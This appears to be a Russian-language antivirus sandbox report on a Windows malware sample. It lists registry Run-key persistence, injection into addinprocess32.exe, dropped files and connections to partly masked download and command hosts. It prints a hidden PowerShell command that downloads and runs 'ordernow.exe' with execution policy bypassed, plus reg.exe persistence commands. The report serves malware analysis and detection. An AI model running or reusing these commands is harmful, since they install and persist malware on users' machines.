Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'khgfjhgddjhgf' = '<SYSTEM32>\pcalua.exe -a %APPDATA%\jhkadjgkahgdh.exe'
Вредоносные функции
Загружает и запускает на исполнение
- http://pl####csheets.ie/ordernow.exe как %appdata%\ordernow.exe
Внедряет код в
следующие пользовательские процессы:
- addinprocess32.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abctfhghghghghž.sct
- %APPDATA%\ordernow.exe
- %TEMP%\addinprocess32.exe
- %APPDATA%\jhkadjgkahgdh.exe
Сетевая активность
Подключается к
- 'hu####.takeithomes.xyz':4040
TCP
Запросы HTTP GET
- http://pl####csheets.ie/ordernow.exe
UDP
- DNS ASK pl####csheets.ie
- DNS ASK hu####.takeithomes.xyz
Другое
Создает и запускает на исполнение
- '%APPDATA%\ordernow.exe'
- '%APPDATA%\jhkadjgkahgdh.exe'
- '%TEMP%\addinprocess32.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://pl####csheets.ie/ordernow.exe','%APPDATA%\ordernow.exe');Start-Process...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\cmd.exe' /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v khgfjhgddjhgf /t REG_SZ /d <SYSTEM32>\pcalua.exe" -a %APPDATA%\jhkadjgkahgdh.exe"
- '%WINDIR%\syswow64\reg.exe' ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v khgfjhgddjhgf /t REG_SZ /d <SYSTEM32>\pcalua.exe" -a %APPDATA%\jhkadjgkahgdh.exe"
